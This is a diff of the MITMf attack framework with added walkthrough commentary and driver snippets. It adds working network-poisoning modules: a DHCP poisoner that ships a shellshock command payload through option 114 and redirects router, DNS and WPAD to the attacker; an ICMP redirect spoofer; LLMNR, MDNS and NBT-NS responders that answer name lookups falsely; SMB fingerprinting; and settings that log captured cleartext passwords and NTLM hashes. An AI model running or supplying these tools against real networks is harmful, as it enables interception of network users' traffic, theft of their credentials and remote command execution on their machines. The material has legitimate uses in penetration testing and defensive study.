if method == 'requested':
log.info("Got DHCP DISCOVER from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP DISCOVER from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "offer"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address)),
"end"]))
log.info("Sending DHCP OFFER")
self.s2.send(packet)
if resp[DHCP].options[0][1] == 3:
method, client_ip = self.get_client_ip(xid, resp[DHCP].options)
if method == 'requested':
log.info("Got DHCP REQUEST from: {} requested_addr: {} xid: {}".format(mac_addr, client_ip, hex(xid)))
else:
log.info("Got DHCP REQUEST from: {} xid: {}".format(mac_addr, hex(xid)))
packet = (Ether(src=self.mac_address, dst='ff:ff:ff:ff:ff:ff') /
IP(src=self.ip_address, dst='255.255.255.255') /
UDP(sport=67, dport=68) /
BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=self.ip_address, xid=xid) /
DHCP(options=[("message-type", "ack"),
('server_id', self.ip_address),
('subnet_mask', self.netmask),
('router', self.ip_address),
('name_server', self.ip_address),
('dns_server', self.ip_address),
('lease_time', 172800),
('renewal_time', 86400),
('rebinding_time', 138240),
(252, 'http://{}/wpad.dat\\n'.format(self.ip_address))]))
if self.shellshock:
log.info("Sending DHCP ACK with shellshock payload")
packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
packet[DHCP].options.append("end")
else:
log.info("Sending DHCP ACK")
packet[DHCP].options.append("end")
self.s2.send(packet)
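dhcp_callback above answers a DISCOVER (option message-type 1) with an OFFER and a REQUEST (message-type 3) with an ACK, pointing router and DNS at the attacker and pushing a WPAD URL through option 252. A hypothetical driver for the class, with argparse.Namespace standing in for MITMf's real options object (the attribute names mirror exactly what __init__ reads):

# Hypothetical driver for the DHCPpoisoner above (Namespace is just a stand-in)
from argparse import Namespace
from time import sleep

opts = Namespace(interface='eth0', ip='192.168.1.10',
                 mac='aa:bb:cc:dd:ee:ff', netmask='255.255.255.0',
                 shellshock=None)        # or a command string to ship via option 114
poisoner = DHCPpoisoner(opts)
poisoner.start()                         # sniffs udp 67/68 in a daemon thread
sleep(60)                                # let it answer DISCOVER/REQUEST for a while
poisoner.stop()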

60
core/poisoners/ICMP.py Normal file

@ -0,0 +1,60 @@
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import threading
from time import sleep
from core.logger import logger
from scapy.all import IP, ICMP, UDP, sendp
formatter = logging.Formatter("%(asctime)s [ICMPpoisoner] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ICMPpoisoner", formatter)
class ICMPpoisoner():
def __init__(self, options):
self.target = options.target
self.gateway = options.gateway
self.interface = options.interface
self.ip_address = options.ip
self.debug = False
self.send = True
self.icmp_interval = 2
def build_icmp(self):
pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=self.ip_address) /\
IP(src=self.target, dst=self.gateway)/UDP()
return pkt
def start(self):
pkt = self.build_icmp()
t = threading.Thread(name='icmp_spoof', target=self.send_icmps, args=(pkt, self.interface, self.debug,))
t.setDaemon(True)
t.start()
def stop(self):
self.send = False
sleep(3)
def send_icmps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)
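build_icmp above pairs an ICMP type 5 / code 1 header (redirect for host), carrying the attacker's IP in the gateway field, with a quoted copy of the target-to-gateway IP/UDP header. A standalone sketch of the same construction (assumes scapy; the addresses are placeholders):

# Standalone sketch of the redirect packet built above (scapy; addresses are placeholders)
from scapy.all import IP, ICMP, UDP, send

target, gateway, attacker = '192.168.1.50', '192.168.1.1', '192.168.1.10'
redirect = (IP(src=gateway, dst=target) /          # appears to come from the legitimate gateway
            ICMP(type=5, code=1, gw=attacker) /    # "redirect for host": use the attacker as next hop
            IP(src=target, dst=gateway) / UDP())   # quoted header of the flow being redirected
send(redirect, verbose=False)                      # one-off layer-3 send; the class above loops sendp() instead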

119
core/poisoners/LLMNR.py Normal file

@ -0,0 +1,119 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import struct
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
import threading
from traceback import print_exc
from core.responder.packets import LLMNR_Ans
from core.responder.odict import OrderedDict
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPLLMNRServer(('', 5355), LLMNRServer)
t = threading.Thread(name='LLMNR', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LLMNR server on port 5355: {}".format(e)
class ThreadingUDPLLMNRServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.252"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def Parse_LLMNR_Name(data):
NameLen = struct.unpack('>B',data[12])[0]
Name = data[13:13+NameLen]
return Name
def IsOnTheSameSubnet(ip, net):
net = net+'/24'
ipaddr = int(''.join([ '%02x' % int(x) for x in ip.split('.') ]), 16)
netstr, bits = net.split('/')
netaddr = int(''.join([ '%02x' % int(x) for x in netstr.split('.') ]), 16)
mask = (0xffffffff << (32 - int(bits))) & 0xffffffff
return (ipaddr & mask) == (netaddr & mask)
def IsICMPRedirectPlausible(IP):
dnsip = []
for line in file('/etc/resolv.conf', 'r'):
ip = line.split()
if len(ip) < 2:
continue
if ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False:
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] You can ICMP Redirect on this network.")
settings.Config.AnalyzeLogger.warning("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x))
else:
pass
if settings.Config.AnalyzeMode:
IsICMPRedirectPlausible(settings.Config.Bind_To)
# LLMNR Server class
class LLMNRServer(BaseRequestHandler):
def handle(self):
data, soc = self.request
Name = Parse_LLMNR_Name(data)
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: LLMNR] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
Buffer.calculate()
soc.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [LLMNR] Poisoned request for name {}".format(self.client_address[0], Name))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version: {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version: {}".format(Finger[1]))

102
core/poisoners/MDNS.py Normal file

@ -0,0 +1,102 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import core.responder.settings as settings
import socket
import threading
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.packets import MDNS_Ans
from core.responder.utils import *
def start():
try:
server = ThreadingUDPMDNSServer(('', 5353), MDNSServer)
t = threading.Thread(name='MDNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting MDNS server on port 5353: {}".format(e)
class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
MADDR = "224.0.0.251"
self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP, socket.inet_aton(MADDR) + settings.Config.IP_aton)
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def Parse_MDNS_Name(data):
try:
data = data[12:]
NameLen = struct.unpack('>B',data[0])[0]
Name = data[1:1+NameLen]
NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
return Name+'.'+Name_
except IndexError:
return None
def Poisoned_MDNS_Name(data):
data = data[12:]
Name = data[:len(data)-5]
return Name
class MDNSServer(BaseRequestHandler):
def handle(self):
MADDR = "224.0.0.251"
MPORT = 5353
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
# Break out if we don't want to respond to this host
if (not Request_Name) or (RespondToThisHost(self.client_address[0], Request_Name) is not True):
return None
try:
# Analyze Mode
if settings.Config.AnalyzeMode:
if Parse_IPV6_Addr(data):
settings.Config.AnalyzeLogger.warning('{} [Analyze mode: MDNS] Request for {}, ignoring'.format(self.client_address[0], Request_Name))
# Poisoning Mode
else:
if Parse_IPV6_Addr(data):
Poisoned_Name = Poisoned_MDNS_Name(data)
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
Buffer.calculate()
soc.sendto(str(Buffer), (MADDR, MPORT))
settings.Config.PoisonersLogger.warning('{} [MDNS] Poisoned answer for name {}'.format(self.client_address[0], Request_Name))
except Exception:
raise
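Parse_MDNS_Name above skips the 12-byte DNS header and glues the first two length-prefixed labels back together, while Poisoned_MDNS_Name keeps the raw encoded name that gets echoed into the spoofed answer. A worked example on a hand-built query (the payload is made up):

# Hand-built mDNS question, showing what the two parsers above extract (payload is made up)
header = '\x00' * 12                                 # 12-byte DNS header (contents irrelevant here)
qname  = '\x07example\x05local\x00'                  # length-prefixed labels "example" and "local"
data   = header + qname + '\x00\x01\x00\x01'         # QTYPE A, QCLASS IN

print(repr(Parse_MDNS_Name(data)))     # 'example.\x05local' -- note it keeps the second label's length byte
print(repr(Poisoned_MDNS_Name(data)))  # '\x07example\x05local' -- the raw encoded name echoed into the answer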

99
core/poisoners/NBTNS.py Normal file

@ -0,0 +1,99 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import socket
import threading
import core.responder.settings as settings
import core.responder.fingerprint as fingerprint
from core.responder.packets import NBT_Ans
from SocketServer import BaseRequestHandler, ThreadingMixIn, UDPServer
from core.responder.utils import *
def start():
try:
server = ThreadingUDPServer(('', 137), NBTNSServer)
t = threading.Thread(name='NBTNS', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting NBTNS server on port 137: {}".format(e)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
# Define what are we answering to.
def Validate_NBT_NS(data):
if settings.Config.AnalyzeMode:
return False
if NBT_NS_Role(data[43:46]) == "File Server":
return True
if settings.Config.NBTNSDomain == True:
if NBT_NS_Role(data[43:46]) == "Domain Controller":
return True
if settings.Config.Wredirect == True:
if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
return True
else:
return False
# NBT_NS Server class.
class NBTNSServer(BaseRequestHandler):
def handle(self):
data, socket = self.request
Name = Decode_Name(data[13:45])
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0], Name) is not True:
return None
if data[2:4] == "\x01\x10":
if settings.Config.Finger_On_Off:
Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
else:
Finger = None
# Analyze Mode
if settings.Config.AnalyzeMode:
settings.Config.AnalyzeLogger.warning("{} [Analyze mode: NBT-NS] Request for {}, ignoring".format(self.client_address[0], Name))
# Poisoning Mode
else:
Buffer = NBT_Ans()
Buffer.calculate(data)
socket.sendto(str(Buffer), self.client_address)
settings.Config.PoisonersLogger.warning("{} [NBT-NS] Poisoned answer for name {} (service: {})" .format(self.client_address[0], Name, NBT_NS_Role(data[43:46])))
if Finger is not None:
settings.Config.ResponderLogger.info("[FINGER] OS Version : {}".format(Finger[0]))
settings.Config.ResponderLogger.info("[FINGER] Client Version : {}".format(Finger[1]))


@ -17,7 +17,13 @@
#
import sys
import logging
import inspect
import traceback
from core.logger import logger
formatter = logging.Formatter("%(asctime)s [ProxyPlugins] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("ProxyPlugins", formatter)
class ProxyPlugins:
'''
@ -37,39 +43,49 @@ class ProxyPlugins:
vars still have to be set back in the function. This only happens
in handleResponse, but is still annoying.
'''
_instance = None
@staticmethod
def getInstance():
if ProxyPlugins._instance == None:
ProxyPlugins._instance = ProxyPlugins()
mthdDict = {"connectionMade" : "request",
"handleStatus" : "responsestatus",
"handleResponse" : "response",
"handleHeader" : "responseheaders",
"handleEndHeaders": "responseheaders"}
return ProxyPlugins._instance
plugin_mthds = {}
plugin_list = []
all_plugins = []
def setPlugins(self,plugins):
__shared_state = {}
def __init__(self):
self.__dict__ = self.__shared_state
def set_plugins(self, plugins):
'''Set the plugins in use'''
self.plist = []
#build a lookup list
#need to clean up in future
self.pmthds = {}
for p in plugins:
self.addPlugin(p)
self.add_plugin(p)
def addPlugin(self,p):
log.debug("Loaded {} plugin/s".format(len(plugins)))
def add_plugin(self,p):
'''Load a plugin'''
self.plist.append(p)
for mthd in p.implements:
self.plugin_list.append(p)
log.debug("Adding {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems():
try:
self.pmthds[mthd].append(getattr(p,mthd))
self.plugin_mthds[mthd].append(getattr(p,pmthd))
except KeyError:
self.pmthds[mthd] = [getattr(p,mthd)]
self.plugin_mthds[mthd] = [getattr(p,pmthd)]
def removePlugin(self,p):
def remove_plugin(self,p):
'''Unload a plugin'''
self.plist.remove(p)
for mthd in p.implements:
self.pmthds[mthd].remove(p)
self.plugin_list.remove(p)
log.debug("Removing {} plugin".format(p.name))
for mthd,pmthd in self.mthdDict.iteritems():
try:
self.plugin_mthds[mthd].remove(getattr(p,pmthd))
except KeyError:
pass #nothing to remove
def hook(self):
'''Magic to hook various function calls in sslstrip'''
@ -84,16 +100,25 @@ class ProxyPlugins:
args[key] = values[key]
#prevent self conflict
args['request'] = args['self']
if (fname == "handleResponse") or (fname == "handleHeader") or (fname == "handleEndHeaders"):
args['request'] = args['self']
args['response'] = args['self'].client
else:
args['request'] = args['self']
del args['self']
log.debug("hooking {}()".format(fname))
#calls any plugin that has this hook
try:
for f in self.pmthds[fname]:
a = f(**args)
if a != None: args = a
except KeyError:
pass
if self.plugin_mthds:
for f in self.plugin_mthds[fname]:
a = f(**args)
if a != None: args = a
except Exception as e:
#This is needed because errors in hooked functions won't raise an Exception + Traceback (which can be infuriating)
log.error("Exception occurred in hooked function")
traceback.print_exc()
#pass our changes to the locals back down
return args
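In the reworked registry above, mthdDict maps sslstrip's hooked function names to plugin method names (request, responsestatus, response, responseheaders); hook() then calls every registered method with the intercepted objects as keyword arguments and lets the returned dict replace them. A minimal illustrative plugin that add_plugin would accept (the class is made up; real MITMf plugins typically inherit these methods from a shared base class):

# Minimal plugin sketch for the ProxyPlugins registry above (illustrative only)
class UserAgentLogger:
    name = 'UserAgentLogger'                            # add_plugin logs p.name
    # add_plugin looks up every value of mthdDict on the plugin, so all four
    # hook methods must exist on the object it is given.
    def request(self, **kwargs):                        # hooked from sslstrip's connectionMade
        request = kwargs.get('request')
        if request is not None:
            print('client -> %s' % getattr(request, 'uri', '?'))
        return kwargs                                   # returned dict replaces args in hook()
    def responsestatus(self, **kwargs):
        return kwargs
    def response(self, **kwargs):                       # hooked from handleResponse
        return kwargs
    def responseheaders(self, **kwargs):                # hooked from handleHeader/handleEndHeaders
        return kwargs

plugins = ProxyPlugins()                                # Borg-style: instances share __shared_state
plugins.set_plugins([UserAgentLogger()])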


@ -1,106 +0,0 @@
"""Public Suffix List module for Python.
"""
import codecs
import os.path
class PublicSuffixList(object):
def __init__(self, input_file=None):
"""Reads and parses public suffix list.
input_file is a file object or another iterable that returns
lines of a public suffix list file. If input_file is None, an
UTF-8 encoded file named "publicsuffix.txt" in the same
directory as this Python module is used.
The file format is described at http://publicsuffix.org/list/
"""
if input_file is None:
input_path = os.path.join(os.path.dirname(__file__), 'publicsuffix.txt')
input_file = codecs.open(input_path, "r", "utf8")
root = self._build_structure(input_file)
self.root = self._simplify(root)
def _find_node(self, parent, parts):
if not parts:
return parent
if len(parent) == 1:
parent.append({})
assert len(parent) == 2
negate, children = parent
child = parts.pop()
child_node = children.get(child, None)
if not child_node:
children[child] = child_node = [0]
return self._find_node(child_node, parts)
def _add_rule(self, root, rule):
if rule.startswith('!'):
negate = 1
rule = rule[1:]
else:
negate = 0
parts = rule.split('.')
self._find_node(root, parts)[0] = negate
def _simplify(self, node):
if len(node) == 1:
return node[0]
return (node[0], dict((k, self._simplify(v)) for (k, v) in node[1].items()))
def _build_structure(self, fp):
root = [0]
for line in fp:
line = line.strip()
if line.startswith('//') or not line:
continue
self._add_rule(root, line.split()[0].lstrip('.'))
return root
def _lookup_node(self, matches, depth, parent, parts):
if parent in (0, 1):
negate = parent
children = None
else:
negate, children = parent
matches[-depth] = negate
if depth < len(parts) and children:
for name in ('*', parts[-depth]):
child = children.get(name, None)
if child is not None:
self._lookup_node(matches, depth+1, child, parts)
def get_public_suffix(self, domain):
"""get_public_suffix("www.example.com") -> "example.com"
Calling this function with a DNS name will return the
public suffix for that name.
Note that for internationalized domains the list at
http://publicsuffix.org uses decoded names, so it is
up to the caller to decode any Punycode-encoded names.
"""
parts = domain.lower().lstrip('.').split('.')
hits = [None] * len(parts)
self._lookup_node(hits, 1, self.root, parts)
for i, what in enumerate(hits):
if what is not None and what == 0:
return '.'.join(parts[i:])

File diff suppressed because it is too large


@ -0,0 +1,68 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import sys
import socket
import struct
import string
import logging
import settings # used by the except handler in RunSmbFinger
from utils import *
from odict import OrderedDict
from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
def OsNameClientVersion(data):
try:
length = struct.unpack('<H',data[43:45])[0]
pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
return OsVersion, ClientVersion
except:
return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
def RunSmbFinger(host):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(host)
s.settimeout(0.7)
h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
n = SMBNego(data = SMBNegoFingerData())
n.calculate()
Packet = str(h)+str(n)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x72\x00":
Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
Body = SMBSessionFingerData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
s.send(Buffer)
data = s.recv(2048)
if data[8:10] == "\x73\x16":
return OsNameClientVersion(data)
except:
settings.Config.AnalyzeLogger.warning("Fingerprint failed for host: {}".format(host))
return None

117
core/responder/odict.py Normal file

@ -0,0 +1,117 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end]
self.__map = {}
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other

1277
core/responder/packets.py Normal file

File diff suppressed because it is too large

181
core/responder/settings.py Normal file

@ -0,0 +1,181 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import sys
import socket
import utils
import logging
from core.logger import logger
from core.configwatcher import ConfigWatcher
__version__ = 'Responder 2.2'
class Settings(ConfigWatcher):
def __init__(self):
self.ResponderPATH = os.path.dirname(__file__)
self.Bind_To = '0.0.0.0'
def __str__(self):
ret = 'Settings class:\n'
for attr in dir(self):
value = str(getattr(self, attr)).strip()
ret += " Settings.%s = %s\n" % (attr, value)
return ret
def toBool(self, str):
return True if str.upper() == 'ON' else False
def ExpandIPRanges(self):
def expand_ranges(lst):
ret = []
for l in lst:
tab = l.split('.')
x = {}
i = 0
for byte in tab:
if '-' not in byte:
x[i] = x[i+1] = int(byte)
else:
b = byte.split('-')
x[i] = int(b[0])
x[i+1] = int(b[1])
i += 2
for a in range(x[0], x[1]+1):
for b in range(x[2], x[3]+1):
for c in range(x[4], x[5]+1):
for d in range(x[6], x[7]+1):
ret.append('%d.%d.%d.%d' % (a, b, c, d))
return ret
self.RespondTo = expand_ranges(self.RespondTo)
self.DontRespondTo = expand_ranges(self.DontRespondTo)
def populate(self, options):
# Servers
self.SSL_On_Off = self.toBool(self.config['Responder']['HTTPS'])
self.SQL_On_Off = self.toBool(self.config['Responder']['SQL'])
self.FTP_On_Off = self.toBool(self.config['Responder']['FTP'])
self.POP_On_Off = self.toBool(self.config['Responder']['POP'])
self.IMAP_On_Off = self.toBool(self.config['Responder']['IMAP'])
self.SMTP_On_Off = self.toBool(self.config['Responder']['SMTP'])
self.LDAP_On_Off = self.toBool(self.config['Responder']['LDAP'])
self.Krb_On_Off = self.toBool(self.config['Responder']['Kerberos'])
# Db File
self.DatabaseFile = './logs/responder/Responder.db'
# Log Files
self.LogDir = './logs/responder'
if not os.path.exists(self.LogDir):
os.mkdir(self.LogDir)
self.SessionLogFile = os.path.join(self.LogDir, 'Responder-Session.log')
self.PoisonersLogFile = os.path.join(self.LogDir, 'Poisoners-Session.log')
self.AnalyzeLogFile = os.path.join(self.LogDir, 'Analyzer-Session.log')
self.FTPLog = os.path.join(self.LogDir, 'FTP-Clear-Text-Password-%s.txt')
self.IMAPLog = os.path.join(self.LogDir, 'IMAP-Clear-Text-Password-%s.txt')
self.POP3Log = os.path.join(self.LogDir, 'POP3-Clear-Text-Password-%s.txt')
self.HTTPBasicLog = os.path.join(self.LogDir, 'HTTP-Clear-Text-Password-%s.txt')
self.LDAPClearLog = os.path.join(self.LogDir, 'LDAP-Clear-Text-Password-%s.txt')
self.SMBClearLog = os.path.join(self.LogDir, 'SMB-Clear-Text-Password-%s.txt')
self.SMTPClearLog = os.path.join(self.LogDir, 'SMTP-Clear-Text-Password-%s.txt')
self.MSSQLClearLog = os.path.join(self.LogDir, 'MSSQL-Clear-Text-Password-%s.txt')
self.LDAPNTLMv1Log = os.path.join(self.LogDir, 'LDAP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv1Log = os.path.join(self.LogDir, 'HTTP-NTLMv1-Client-%s.txt')
self.HTTPNTLMv2Log = os.path.join(self.LogDir, 'HTTP-NTLMv2-Client-%s.txt')
self.KerberosLog = os.path.join(self.LogDir, 'MSKerberos-Client-%s.txt')
self.MSSQLNTLMv1Log = os.path.join(self.LogDir, 'MSSQL-NTLMv1-Client-%s.txt')
self.MSSQLNTLMv2Log = os.path.join(self.LogDir, 'MSSQL-NTLMv2-Client-%s.txt')
self.SMBNTLMv1Log = os.path.join(self.LogDir, 'SMB-NTLMv1-Client-%s.txt')
self.SMBNTLMv2Log = os.path.join(self.LogDir, 'SMB-NTLMv2-Client-%s.txt')
self.SMBNTLMSSPv1Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv1-Client-%s.txt')
self.SMBNTLMSSPv2Log = os.path.join(self.LogDir, 'SMB-NTLMSSPv2-Client-%s.txt')
# HTTP Options
self.Serve_Exe = self.toBool(self.config['Responder']['HTTP Server']['Serve-Exe'])
self.Serve_Always = self.toBool(self.config['Responder']['HTTP Server']['Serve-Always'])
self.Serve_Html = self.toBool(self.config['Responder']['HTTP Server']['Serve-Html'])
self.Html_Filename = self.config['Responder']['HTTP Server']['HtmlFilename']
